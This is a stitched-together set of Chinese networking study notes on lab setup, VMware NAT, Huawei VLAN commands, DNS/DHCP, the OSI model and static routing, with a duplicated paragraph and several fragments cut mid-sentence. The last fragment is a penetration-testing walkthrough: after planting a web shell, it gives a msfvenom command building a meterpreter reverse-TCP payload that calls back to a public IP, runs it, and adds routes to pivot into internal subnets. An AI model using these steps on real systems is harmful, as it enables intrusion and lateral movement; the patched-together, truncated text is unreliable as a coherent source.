网段

21.网工学习环境准备. 一. 关掉所有杀毒软件及管家如阿健. 二. 安装环回网卡 (一定要先安装.) 1. 计算机设备管理 2. 在右侧最上端计算机名上方右键,点击过时硬件. 3. 下一步.手动选择,网络适配器,下一步 4. Microsoft厂商,右侧下面找到loopback点击下一步. 三. 安装Cisco Packet Tracer 下一步默认安装即可.也可以找汉化. 四. 安装华为的ensp 所有里面的所有软件全都默认安装即可. 22.网络概述 633128203 一. 如何查找一个服务器在哪呢:假设淘宝.首先得到淘宝的ip,ping一下就知道 了.注:cmd界面右键标记想要的内容,然后回车就可以复制下来了.在ip138里查找一下这个ip就可以知道他的服务器在哪了. 二. 那么我们是如何访问一个网站的呢?或者是说如何传递数据的呢. 1. 一定是要通过运营商. 2. 一定要有一个唯一的标识.也就是IP 3. 广域网最简单的模型 4. 国家骨干网的拓扑图.(图中左下角为传输速度.) 5. 运营商在全国有二十七八个节点.每个节点就是大型的机房 有很多的大型路由和交换设备 6. 7. 上一个网站有多少数据包?传一部电影有多少数据? 用wireshark抓包. 8. 抓包软件先选择相应的网卡. 9. 广域网模型 10. 23.OSI七层模型. 一.IP:internet

1、检查Linux虚拟机的网络连接模式，确保它是NAT模式。 2、在VMware workstation里，点击菜单栏上的【编辑】-->【虚拟网络编辑器】，选择VMnet8（NAT模式），取消勾选【适用本地DHCP服务将IP地址分配给虚拟机】 3、点击NAT设置(s)... 如上图所示，虚拟机所在的网段为192.168.164.0，网关为192.168.164.2 4、设置虚拟机Linux系统中的IP地址 其中IP地址要在192.168.164.0这个网段内，且不能和网关及广播地址冲突 设置完后使用service network restart命令重启网卡 5、设置VMnet8在Windows上的IP属性 网络和共享中心->更改适配器设置->VMnet8右键属性->设置IPv4地址同样在192.168.164.0这个网段内，并设置子网掩码。 6、上述配置完成后就可以在Xshell中连接虚拟机了 新建连接时主机名要填写Linux系统刚刚配制好的IP地址。 参考： 1） 如何使用Xshell连接VMware上的Linux虚拟机 来源： https://www.cnblogs.com/GjqDream/p/11745686.html

system-view vlan 10 / vlan 20 quit （可打可不打） interface Ethernet 0/0/1（0/0/2........） port link-type access port default vlan 10 system-view interface GigabitEthernet 0/0/2 port link-type trunk port trunk allow-pass vlan10 20 效果：同网段的PC机可以互ping，不同网段无法互ping。 来源： https://www.cnblogs.com/YoLenLy/p/11725603.html

前言 DNS: 解析域名成ip地址 域名： 全球唯一 顶级域名：com，edu，net，cn，org，gov 二级域名：需要申请 三级域名 www mail ftp，跟不同服务相关的。 域名解析： 分布式查询技术 DNS服务器： 节省域名解析的流量 DHCP: 动态主机配置 ftp: 文件传输协议 hhtp: 超文本传输协议 web代理服务器 节省内网访问Internet带宽 通过web代理绕过防火墙 发送数据与接收数据 将一个网段划分为多个网段 合并网段 DHCP服务 动态主机配置协议 DHCP： 负责给互联网上的计算机提供动态的IP地址。 连接到因特网的计算机都需要配置以下几个项目： (1) IP 地址 (2) 子网掩码 (3) 默认路由器的 IP 地址即网关 (4) 域名服务器的 IP 地址 IP地址获取方式有两种： 一种静态IP，一种动态IP。 静态IP是人工自己指定的，一般公司自己组建的局域网、学校机房的固定的计算机、机房服务器、互联网上的大型服务器， 凡是位置固定不动的，都用静态IP地址。 动态IP地址是用DHCP服务器来分配的地址，适用于计算机位置不固定、家庭拨号上网等情况。可以避免产生IP地址冲突。 DHCP客户端请求IP地址的过程（逆arp协议）： 需要地址的客户机先在网上发广播包请求地址，DHCP服务器收到广播包后在自己的地址池里选一个地址

网络基础 (1) 架构 a. C / S架构 : client客户端 和 server服务器端 优势 : 能充分发挥PC机的性能 b. B / S架构 : browser浏览器 和 server服务器 隶属于C/S架构 B / S架构 统一了应用的接口. (2) 通信的事: a. 同一台电脑上两个py程序通信 : 打开一个文件 b. 两个电脑如何通信 : 连一个网线 c. 多个电脑通信 : mac地址：是一个物理地址,全球唯一, 类似于身份证 ip地址：是一个四位点分十进制,它标识了计算机在网络中的位置.类似于学号 交换机的通信方式: 广播 : 单播 : 一对一 组播 : 一对多 arp协议：通过目标ip地址获取目标mac地址的一个协议 端口 : 操作系统为本机上每一个运行的程序都随机分配一个端口,其他电脑上的程序可以通过端口获取到这个程序 ip地址 + 端口 能唯一找到某台电脑上的某一个服务程序 路由器 : 连接不同网段 , 路由 网关 : 类似于一个局域网的出口和入口 网段 : 一个局域网内的ip地址范围 子网掩码 : 子网掩码 & ip地址 得到网段 网桥：可以跨网段传输数据，而二层交换机没办法实现跨网段 osi 五层模型: 应用层 : http,https,ftp 传输层 : tcp / udp 四层交换机 四层路由器 网络层 : ip协议 路由器 三层交换机 数据链路层

拓扑： 路由的递归查询到底是干什么的？ 路由的递归查询针对静态路由来讲，对于动态路由就没必要了。之所以要使用递归路由，目的是绕开那些经常变动的链路，可以使静态路由的配置工作量减小。 使用递归路由的一个条件：到达目标网络的链路在途中可以汇聚成比目标网络数量更少的链路。 路由器逐跳将数据包发送到目的地，静态路由可以指定到目的地的每一跳，但是如果路径上某个节点出现问题，整条静态路由就不能工作了，如果真的能用到静态路由，则需要管理员重新指定一条可以到达目的地的静态路由，很蛋疼。 递归路由可以在一定程度上解决这个问题： 对于上面的拓扑 ,R1 需要经过 R2 或 R3 路由器，将数据包发送给 R4 下的网段，管理员需要指定一条从 R2 或 R3 到 R4 下网段的静态路由，如果指定的是经过 R2 的静态路由，那如果 R2 不幸 down 掉，则需要在指定经过 R3 的路由，对于这样简单的拓扑还可以，但对于大点的网络环境，则比较麻烦。 如果 R1 不指定 R2 或 R3 ，直接指定 R4 路由器的 f0/0 接口，如果 R2 down 掉，则可以通过 R3 继续工作。 目标： 从 R1 可以访问 R4 路由之下的四个网段。 实现： 1. 静态路由关联 R2 或 R3 ，来实现与 R4 的通信，但这样存在问题，如果 R2 或 R3 中有路由器无法使用了，得重新修改路由配置 2. 直接关联 R4

拓扑： 屏幕剪辑的捕获时间:2013/10/20 20:05 路由的递归查询到底是干什么的？ 路由的递归查询针对静态路由来讲，对于动态路由就没必要了。之所以要使用递归路由，目的是绕开那些经常变动的链路，可以使静态路由的配置工作量减小。 使用递归路由的一个条件：到达目标网络的链路在途中可以汇聚成比目标网络数量更少的链路。 路由器逐跳将数据包发送到目的地，静态路由可以指定到目的地的每一跳，但是如果路径上某个节点出现问题，整条静态路由就不能工作了，如果真的能用到静态路由，则需要管理员重新指定一条可以到达目的地的静态路由，很蛋疼。 递归路由可以在一定程度上解决这个问题： 对于上面的拓扑 ,R1 需要经过 R2 或 R3 路由器，将数据包发送给 R4 下的网段，管理员需要指定一条从 R2 或 R3 到 R4 下网段的静态路由，如果指定的是经过 R2 的静态路由，那如果 R2 不幸 down 掉，则需要在指定经过 R3 的路由，对于这样简单的拓扑还可以，但对于大点的网络环境，则比较麻烦。 如果 R1 不指定 R2 或 R3 ，直接指定 R4 路由器的 f0/0 接口，如果 R2 down 掉，则可以通过 R3 继续工作。 目标： 从 R1 可以访问 R4 路由之下的四个网段。 实现： 1. 静态路由关联 R2 或 R3 ，来实现与 R4 的通信，但这样存在问题，如果 R2 或 R3

本内容来自韩立刚老师主编的《计算机网络原理创新教程》第6.4.7小节，关于给计算机添加路由的一个应用场景。 如图所示，某公司在电信机房部署了一个web服务器，该web服务器需要访问数据库服务器。为了安全起见，该公司在电信机房又部署了一个路由器和交换机，将数据库服务器单独部署在一个网段（公司内网）。在企业路由器上没有添加任何路由，在电信的路由器上也没有添加到内网的路由（电信的路由器不可能添加到私网的路由）。为了让Internet上的主机能访问web服务器，该web服务器的默认网关指向电信的路由器，但这样该web服务器将不能访问内网的数据库服务器。怎样才能鱼与熊掌兼得呢？这需要在web服务器上添加一条到内网的路由。 该实验使用华为eNSP模拟器完成。为了能够在web服务器上添加路由，web服务器使用一台Windows虚拟机代替，该虚拟机网络放置在VMnet1网段 ，通过Cloud实现Windows虚拟机与图中网络相连，Cloud的设置如下图所示： web服务器（虚拟机）的ip地址设置如下（网关指向电信的路由器）： 经测试，图中右边的计算机192.168.0.2能够ping通web服务器，但web服务器不能ping通内网的数据库服务器。这时需要在web服务器上添加一条静态路由，如下： 或者添加一条主机路由： -p表示永久添加，下次启动还有效。 如果要删除到172.16.0.0

网络模型分层 OSI(open system Interconnection)七层模型结构 物理层:bit位 二进制传输,发送高低电平,单位:比特,只看010101 为启动,维护以及关闭物理链路定义了电气规范,机械规范和功能规范. 数据链路层:frame帧 访问介质,定义了物理地址 定义如何格式化数据一边进行传输以及如何控制对网络的访问 支持错误检测 实现同一网段内的链路层通讯(一般通过交换机) 数据帧(frame)与比特之间的转换 网络层:packet包,报文 数据传输,定义了逻辑地址(IP地址) 定义了路由,确定路由数据包 选择传递数据的最佳路径(路由),==路由就是选择路径== 支持逻辑寻址和路径选择 IP地址,用于唯一标识计算机网路地址.点分四段十进制IPV4/6的IP地址 传输层:segment段 TCP/UDP协议,都是基于端口工作的. 端口号:表示电脑上某一软件 端口号范围:0,65535 注意: ​ 1.操作系统中,一般0~1024的端口都被默认使用了 ​ 2.尽量使用8000以后的端口号 开发中常用端口号: ​ mysql:3306 ​ mongodb:27017 ​ Django:8000 ​ Tomcat:8080 ​ Flask:5000 ​ Redis:6379 传输问题:实现终端对终端的通讯 用于过路由器的跨网段通讯 确保数据传输的可靠性

目录 反弹MSF类型的Shell 添加内网路由 MSF的跳板功能是MSF框架中自带的一个路由转发功能，其实现过程就是MSF框架在已经获取的Meterpreter Shell的基础上添加一条去往“内网”的路由，直接使用MSF去访问原本不能直接访问的内网资源，只要路由可达了那么我们使用MSF来进行探测了。 我们现在有下面这个环境： Web服务器通过端口映射，对外提供Web服务。Web服务器上有两张网卡，内网分别还有其他两台服务器，一台开放了http服务，一台开放了SMB服务。拓扑图如下： 反弹MSF类型的Shell 我们通过web渗透，成功往Web服务器上上传了一句话木马，成功用菜刀连接。 然后我们现在想获得一个MSF类型的Shell。 我们先生成一个木马文件 msfvenom -p windows/meterpreter/reverse_tcp lhost= 112.74 .89 .58 lport= 42906 -f exe -o test.exe 用菜刀上传到Web服务器上，然后执行我们的木马程序，Kali成功获得反弹的MSF类型的shell。 添加内网路由 然后我们现在想要继续渗透内网。 我们先获取目标内网相关信息，可以看到该主机上的网卡有两个网段。 run get_local_subnets 如果我们不添加这两个网段路由的话，是探测不到这两个网段其他主机的。